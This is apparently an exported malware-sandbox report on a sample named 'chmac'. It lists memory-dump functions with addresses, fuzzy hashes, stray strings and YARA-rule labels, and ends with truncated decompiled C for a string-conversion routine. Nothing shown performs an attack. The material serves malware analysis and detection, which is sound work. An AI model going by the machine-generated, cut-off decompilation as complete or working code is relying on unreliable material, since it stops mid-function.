Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: dea3d8fdeee9d6e5f7195663f13683ae25ee4d8fb54f36dbc07fcb4f42c761f1
Instruction ID: 2a525cfe9a80ebf9015702bf4c3639ff1309f3c48e86b138791f70d43c064ecb
Opcode Fuzzy Hash: dea3d8fdeee9d6e5f7195663f13683ae25ee4d8fb54f36dbc07fcb4f42c761f1
Instruction Fuzzy Hash: 8B41C170E481558BCB10CB69D8845BEBBB2BBC1214F288976CC56DB601C731E843CB96

Uniqueness

Uniqueness Score: -1.00%

Function 02570BC0, Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

hXMr, xrefs: 02570C78

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID: hXMr
API String ID: 0-1185242784
Opcode ID: 1ccee22b611adcc2cfd1224f664d97501e84ee42512d3901035df31f25e0985e
Instruction ID: f476ae1ac7e7c0afd0916273f1786a0494d8564a852279f015ab9ced145f1ba3
Opcode Fuzzy Hash: 1ccee22b611adcc2cfd1224f664d97501e84ee42512d3901035df31f25e0985e
Instruction Fuzzy Hash: 2341FA31B05114CFC7159B68D4146AEBBEABFC5310F15846AE80AEF3A1CEB19C0AC796

Uniqueness

Uniqueness Score: -1.00%

Function 02571458, Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

$gq, xrefs: 025714C7

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID: $gq
API String ID: 0-815412418
Opcode ID: 68d93433e0815c0cb78cf35ec7eed325ea765a0302a1c1926c3e1a86014d1964
Instruction ID: 682881126a91fd8183bd5d04de1899a27e352dbca5650f6cf6395e0d072f0901
Opcode Fuzzy Hash: 68d93433e0815c0cb78cf35ec7eed325ea765a0302a1c1926c3e1a86014d1964
Instruction Fuzzy Hash: 1D511634A00659CFDB14DF64D998B9DBBB2BF49300F5080E9D40AAB366CB359E88CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02571290, Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

$gq, xrefs: 02571349

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID: $gq
API String ID: 0-815412418
Opcode ID: dc2e074a9ef25018315c91c0efcf293a91e857777fb3e3b80db884f669bb9607
Instruction ID: ac9079584b7fb4ae3a473e0c03f7bfb34c9509236a3184cdf12440564876f432
Opcode Fuzzy Hash: dc2e074a9ef25018315c91c0efcf293a91e857777fb3e3b80db884f669bb9607
Instruction Fuzzy Hash: 66411434A04619DFDB24DF65D888BADBBB1BB49340F0084E9D40EAB355DB309D84CF65

Uniqueness

Uniqueness Score: -1.00%

Function 025721F8, Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

r*+, xrefs: 0257230F

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID: r*+
API String ID: 0-3221063712
Opcode ID: 5ceeabdd196278b95e8e42d6f1fd4f15f12e669175bc0d3622d7640bad70a10e
Instruction ID: 2aa96f39d1e7ecedc5edb1217c187d3ef19639956626195e4ab0786e961e24fd
Opcode Fuzzy Hash: 5ceeabdd196278b95e8e42d6f1fd4f15f12e669175bc0d3622d7640bad70a10e
Instruction Fuzzy Hash: 04414730E48209DFCB44DFB5D5456AEBBB1FB54304F1084AAD802E72A1DB34DA06CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 025705B9, Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

8$q, xrefs: 025705D6

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID: 8$q
API String ID: 0-2903697390
Opcode ID: 34e6dec018c1a46260623469a3e3096c6dd82b7c26817e6c42b658a1c128f86f
Instruction ID: 2b8f9e79ca1632721c442f9593e230c5b3780abafafb8d1ca066acbab049faf1
Opcode Fuzzy Hash: 34e6dec018c1a46260623469a3e3096c6dd82b7c26817e6c42b658a1c128f86f
Instruction Fuzzy Hash: 420121203051600FC70A233C61226BE27ABAFC6A12B18006FF046DB3EACC645C4B83E6

Uniqueness

Uniqueness Score: -1.00%

Function 025705C8, Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

8$q, xrefs: 025705D6

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID: 8$q
API String ID: 0-2903697390
Opcode ID: a410ef69cefd3e0d324aa151f459f5ec5671e79a7fae5546d312c172f5badbdf
Instruction ID: 693485b0047edd7f1edfe811d105bf0b1b6ea0b776cce4fabb12bc4e3ab9af85
Opcode Fuzzy Hash: a410ef69cefd3e0d324aa151f459f5ec5671e79a7fae5546d312c172f5badbdf
Instruction Fuzzy Hash: 7DF0B4613010240BC609337D761267F22DF6BC6A52B14443EF106DB3E9DD75AC4743EA

Uniqueness

Uniqueness Score: -1.00%

Function 02570682, Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 269dd1e78380f4b51e2622376449a4fd962cdee1778b07ef8f39e3a768789db0
Instruction ID: 3e11998fb713c6c496a01ed24c348a3941d5bf3ccc8011f32e416623f03e33b8
Opcode Fuzzy Hash: 269dd1e78380f4b51e2622376449a4fd962cdee1778b07ef8f39e3a768789db0
Instruction Fuzzy Hash: F84179312682418BC705BBB4ED2D6AD3BB6BF8171A7144969F402CB2B6DFB44C068B91

Uniqueness

Uniqueness Score: -1.00%

Function 02572BF8, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69e1220eb2f11c878f00a8564e53a0c78248d999564f49d492f44046dabf4e27
Instruction ID: 6808f2066aebabe32466c7189cb6b7843d043bc064e76f0b14bbedaf8f3abd25
Opcode Fuzzy Hash: 69e1220eb2f11c878f00a8564e53a0c78248d999564f49d492f44046dabf4e27
Instruction Fuzzy Hash: 0241243024D295EFC7268738AC985697FB8BF52200F0989E7D886CF663C7618C46C756

Uniqueness

Uniqueness Score: -1.00%

Function 025702DA, Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0791501e4ee81d119b9cec7dbab6f84a8a108cd13fc1333a1eebfcc0fd32627d
Instruction ID: 1553ae7c64706f70359b7ec2e8976f79c2405ba6e8bc744277b9fff3666f4ed9
Opcode Fuzzy Hash: 0791501e4ee81d119b9cec7dbab6f84a8a108cd13fc1333a1eebfcc0fd32627d
Instruction Fuzzy Hash: 7B418C74B552058FDB14CB68D1A4BAEBBF2FF88310F148469E502AB3E1CB72AC45CB55

Uniqueness

Uniqueness Score: -1.00%

Function 02570006, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f16d7dd88ba4bb4e3777216ea1942c362f9303c2cc63728a3a63c72128a9bd64
Instruction ID: 520c2fea169dcd69bb103a274cefc7ecca31d67d2e1c2cf7d9f91af397bdb3bd
Opcode Fuzzy Hash: f16d7dd88ba4bb4e3777216ea1942c362f9303c2cc63728a3a63c72128a9bd64
Instruction Fuzzy Hash: C2313A2010E3C29FCB039B749DA95693FF1BE87218B0988DBE4C1CB5A7D6759809DB17

Uniqueness

Uniqueness Score: -1.00%

Function 025720D0, Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11ea1c4e05d85749c31b73dcce8b81ff7d23c8f2a91d1ac1038dc0d8bc6a23ea
Instruction ID: 8bc3713f1372428afa77fc1deeca7e478f08a95cafc998c0fa12a7ef3d5a656c
Opcode Fuzzy Hash: 11ea1c4e05d85749c31b73dcce8b81ff7d23c8f2a91d1ac1038dc0d8bc6a23ea
Instruction Fuzzy Hash: 1631C434A4424ADFCB15DF68E89067EBBB6FF84300F15846AC946DB245D730AC41CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 025725DE, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9963ab62776056938b1a98f111cd73422ef86b06168d995bc2d5196a32f5e59f
Instruction ID: 1dbc15e256fa29d1413650ae153cfc481ad684f9f778c3d14a6f5e09c1102d0c
Opcode Fuzzy Hash: 9963ab62776056938b1a98f111cd73422ef86b06168d995bc2d5196a32f5e59f
Instruction Fuzzy Hash: 6331AFB1E00245CFDB21DFA5D95479ABBF2BF44318F10C129C406DB265CBB4994ACF44

Uniqueness

Uniqueness Score: -1.00%

Function 025721E9, Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77e06d7f04512ab48572b913c137f12f6aefda9dc3649c68b241d8984a46dd10
Instruction ID: bb3136bc285b762f6c2e9dd90359f7303752f486fabb6fa15aea52dfdf8e3351
Opcode Fuzzy Hash: 77e06d7f04512ab48572b913c137f12f6aefda9dc3649c68b241d8984a46dd10
Instruction Fuzzy Hash: B7318C70E4820ADFCB44DBA4D5456BDBBB1FF25300F1044AAC802EB2A1DB34DA05CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 02574190, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11f7a8e035efa22f6314a5720b8bcad62993643a9b4a35c45704aa549c04185d
Instruction ID: 3fb9817a193fd0dc7f643af225a381448a55a9c5922ebd4fb391b16f21df3570
Opcode Fuzzy Hash: 11f7a8e035efa22f6314a5720b8bcad62993643a9b4a35c45704aa549c04185d
Instruction Fuzzy Hash: 41110331B402068BCB14EBB5E9556BF7ABABFD5300F51463AD807A7281DE758800C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 00A88244, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359136524.0000000000A80000.00000040.00000040.sdmp, Offset: 00A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a80000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3ebf433bed58c00cd7838e2c82841a6f39f1fe017ce6726603bacb1ca06fa9c
Instruction ID: 458fddcbb6d36a4f1c0e7c4efe6db59c094f252e5f8a6cd3f91f9f1b935dcb35
Opcode Fuzzy Hash: b3ebf433bed58c00cd7838e2c82841a6f39f1fe017ce6726603bacb1ca06fa9c
Instruction Fuzzy Hash: FC11E4302446809FC315DB54C944B66BBA2EF88708F64C99CE8490B643DF7FD802CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A8820E, Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359136524.0000000000A80000.00000040.00000040.sdmp, Offset: 00A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a80000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f6775972386bcd4b9289bf8691b5bf4cd94f864cfff22b330243f92502d5df2
Instruction ID: d137f8a049c058f758b78111cd3d28a2322c4e8ff3c0fb0e933df3e542ce4692
Opcode Fuzzy Hash: 1f6775972386bcd4b9289bf8691b5bf4cd94f864cfff22b330243f92502d5df2
Instruction Fuzzy Hash: 4D213B3550D7C08FD717CB20D850B55BFB2AB57318F1986DED8888B6A3CB3A8806DB52

Uniqueness

Uniqueness Score: -1.00%

Function 02574180, Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc8e303b6b47bedd378dfaf07b2a7beb2159ddae1f6d06d2c93755382bb07572
Instruction ID: 4828561cd53064c5f19fab693546d0a4a3f92824cf26abc0bce549733d2c92a1
Opcode Fuzzy Hash: cc8e303b6b47bedd378dfaf07b2a7beb2159ddae1f6d06d2c93755382bb07572
Instruction Fuzzy Hash: F301493178C280CBC71177B5F8144AA7BBABEE529170009BBC40697201DB718402C749

Uniqueness

Uniqueness Score: -1.00%

Function 025711DF, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd569d1a551011a435c5843a4afcd7637c3e45de9f1161f283eb945a1d251840
Instruction ID: 54a96d44df0f43fb2e235b42435be0e840681d5cef53bd245e315fd0959553d4
Opcode Fuzzy Hash: bd569d1a551011a435c5843a4afcd7637c3e45de9f1161f283eb945a1d251840
Instruction Fuzzy Hash: 8A11C4303085809FC7069B29E56896D7FF5BF9760071585EBD04ACF6B2CB758C09CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0257238F, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceefd613da8bc516e225c73662ca30c2b01cdbb8fb317df107b607a51c03b8b8
Instruction ID: fcf837aa9d970efd29ed1ffbdaeb5e21fdb468b5b89cb43923eb3271e80caa17
Opcode Fuzzy Hash: ceefd613da8bc516e225c73662ca30c2b01cdbb8fb317df107b607a51c03b8b8
Instruction Fuzzy Hash: 4E119E70D58299CFDB258F64E954AADBFB2FB44304F0008AEC942E7345DB710882CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00A805CF, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359136524.0000000000A80000.00000040.00000040.sdmp, Offset: 00A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a80000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67fba0b6b81b03df90466140bfc62c2fb0ceaa5cc8301561dde57362054755f3
Instruction ID: 51e27e71c3acb822cf826e6851389464f4f3cbd5aecbd8427e4604257e213187
Opcode Fuzzy Hash: 67fba0b6b81b03df90466140bfc62c2fb0ceaa5cc8301561dde57362054755f3
Instruction Fuzzy Hash: EC01DBB150D7845FD7528F16EC40862FFA8EF46620709C4AFEC498B612D225A508CFB2

Uniqueness

Uniqueness Score: -1.00%

Function 02571218, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c258c05c8e5ece275142eee25e2efdc6a8fabb12d17f97b807d63127ae4d833b
Instruction ID: fd0f809b393d437d662a4e6525cd887b871e2cecfe5d7336ad3a602c47267e7b
Opcode Fuzzy Hash: c258c05c8e5ece275142eee25e2efdc6a8fabb12d17f97b807d63127ae4d833b
Instruction Fuzzy Hash: 72013130344410CFC608AB2EE55896977EABFD571172484AAE50ACB7B5CF72DC09CB89

Uniqueness

Uniqueness Score: -1.00%

Function 02570908, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6712edb8cd66c9847d8a30453a0b6a00225f9499c5ec110f1bebdf3abf6276a
Instruction ID: e2116aca6fc29b95ea32a1e909863537c73c24000cc5b9289c8580ca3f332b77
Opcode Fuzzy Hash: d6712edb8cd66c9847d8a30453a0b6a00225f9499c5ec110f1bebdf3abf6276a
Instruction Fuzzy Hash: D2F0973095D3849FD7508BB56835AAFBFF13F82240B050A9BCC03A72D2C9A84C02C356

Uniqueness

Uniqueness Score: -1.00%

Function 02570918, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59095f6adbca28575bbd4084d0cb140be7eb7cf41be2fb37f9b2133ced5dfb56
Instruction ID: 421444e6893b5e4babea54c9a9b0c3c2349edc8bbef32d6de185e29642d7a501
Opcode Fuzzy Hash: 59095f6adbca28575bbd4084d0cb140be7eb7cf41be2fb37f9b2133ced5dfb56
Instruction Fuzzy Hash: 13E05532E542189A9B504AF6B9150AFBBE8B780690F0009239D07A3280DAB48801C29A

Uniqueness

Uniqueness Score: -1.00%

Function 00A88300, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359136524.0000000000A80000.00000040.00000040.sdmp, Offset: 00A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a80000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d74a29df55c69f98ab7c4b2aae8ba2665a8ebae01658a76b7ab1be4c5fff073
Instruction ID: 617e1ba8f29f80d361c8f5f13ed8497fd6ae184f04dab1f416e90e1613783772
Opcode Fuzzy Hash: 8d74a29df55c69f98ab7c4b2aae8ba2665a8ebae01658a76b7ab1be4c5fff073
Instruction Fuzzy Hash: DDF0FB35144644DFC216CF44D540B55FBA2EB89718F24C6A9E9490B752CB3B9812DB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A805F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359136524.0000000000A80000.00000040.00000040.sdmp, Offset: 00A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a80000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44fede1fd5b6949028e9137c42cbd776c88b3bc8572b0aa3631a55f16f7f5d7f
Instruction ID: 643dca525f703cffadbdfbc40daf39a063dc4690e89a41278fd0efd93be1eb1c
Opcode Fuzzy Hash: 44fede1fd5b6949028e9137c42cbd776c88b3bc8572b0aa3631a55f16f7f5d7f
Instruction Fuzzy Hash: C1E06D766406048B9650CF0AEC41452F794EB84630B18C46FDC0D8B700E636B508CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 02572D20, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bb4ca0a4095ad5bceecfa08da3800348c74396ff448eef18019743d500ed0b3
Instruction ID: 215efeb21219d99ac3be1b61e37511bb63716d0245d94742c94985dafb715a40
Opcode Fuzzy Hash: 4bb4ca0a4095ad5bceecfa08da3800348c74396ff448eef18019743d500ed0b3
Instruction Fuzzy Hash: 21D0173418D2C49ED32203A83832BE43F20AF5B205F090ED7DCCA8E4A780811847C606

Uniqueness

Uniqueness Score: -1.00%

Function 0257064F, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e219dc721fd2d9c73db8200c2ebdb215a8a601085639695de31e3a7e7b3e72ec
Instruction ID: ca1af023a80c31b29da0615526734d99d3fd212d5ee50880187ebe0c76b71f30
Opcode Fuzzy Hash: e219dc721fd2d9c73db8200c2ebdb215a8a601085639695de31e3a7e7b3e72ec
Instruction Fuzzy Hash: ACD05EB24CE2D48FC3554BB0283A4E83FB1EEA315471489AAC8414E87281622597EA01

Uniqueness

Uniqueness Score: -1.00%

Function 025702A1, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8061070c1255d4a724986c6a098de08002d25a4b25f91adf6cf0d0376fa3d68c
Instruction ID: 9dbb8e86e1b488103fa44d922070e95bd2be32c392baeb69df7b7fbba0d0eb5e
Opcode Fuzzy Hash: 8061070c1255d4a724986c6a098de08002d25a4b25f91adf6cf0d0376fa3d68c
Instruction Fuzzy Hash: 48E0123528DA84CFC3529768E6709D67FF1FF822003458C8DD0C64B996C620AC4AC701

Uniqueness

Uniqueness Score: -1.00%

Function 0257016F, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05afad38b4d0b242476ecf21b9759adef495d3d10c167505209c6d8237c5b2ef
Instruction ID: 141936e90f871d7434e16e8d8ee6f85d4b3636ec2da36a6cc11fd199e4380141
Opcode Fuzzy Hash: 05afad38b4d0b242476ecf21b9759adef495d3d10c167505209c6d8237c5b2ef
Instruction Fuzzy Hash: C1E02B311063448FCB155770D82E05C3F70AF5511170406BED42BCBEF0EA76C486CE40

Uniqueness

Uniqueness Score: -1.00%

Function 00A523F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359077881.0000000000A52000.00000040.00000001.sdmp, Offset: 00A52000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a52000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94e36d4d8ea11cbe7a05261b5a6bc75f2f09a63168969b09bccf1e63ad2f8def
Instruction ID: 65f859af0e293b3622b4673874fe2a4abc297f9fde2041c5cc57a886c03a5f61
Opcode Fuzzy Hash: 94e36d4d8ea11cbe7a05261b5a6bc75f2f09a63168969b09bccf1e63ad2f8def
Instruction Fuzzy Hash: 75D05E79244AC14FD3268B1CC2A8B953BE4AF52B05F4684F9AC008B6A3C778D985D300

Uniqueness

Uniqueness Score: -1.00%

Function 02570180, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dab0dbdf2ccfb060e31921bd171384cd233970c68aa3b339a81927ef1f798cd
Instruction ID: 397804f4fb1d1fa3f7616f7fe2bf53b3f496cbab36d9ac4ada3fc7672eee7eaa
Opcode Fuzzy Hash: 8dab0dbdf2ccfb060e31921bd171384cd233970c68aa3b339a81927ef1f798cd
Instruction Fuzzy Hash: 0FD01230201304CFCB086BB0E41D41C37B9AB4820670008BDE80787B64EE76E881CA80

Uniqueness

Uniqueness Score: -1.00%

Function 02570660, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb09b1dfeee014d2ddf23bec7fbc235107252de340dc406f8a630b529aa57052
Instruction ID: e61c077411b6b888cf5085c64ab12656de337552886cadbfb6256d78e90d595e
Opcode Fuzzy Hash: cb09b1dfeee014d2ddf23bec7fbc235107252de340dc406f8a630b529aa57052
Instruction Fuzzy Hash: 4DC09B710C9264CEC2549BB17D1543D726977D1715750CD36D501041758A72B492D959

Uniqueness

Uniqueness Score: -1.00%

Function 02572EC0, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 536a2a391a13838338e6341707599d73a68e4b6537e9e9fdd661dde623619290
Instruction ID: 228ca7626fc5661b882906bd52ea5655273cd76f2ae41f8c007f856de7339458
Opcode Fuzzy Hash: 536a2a391a13838338e6341707599d73a68e4b6537e9e9fdd661dde623619290
Instruction Fuzzy Hash: B7B012302442090B178097F13C08B27779C55404057501060DC0CC0100F650D0902145

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x7ddc0b39
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
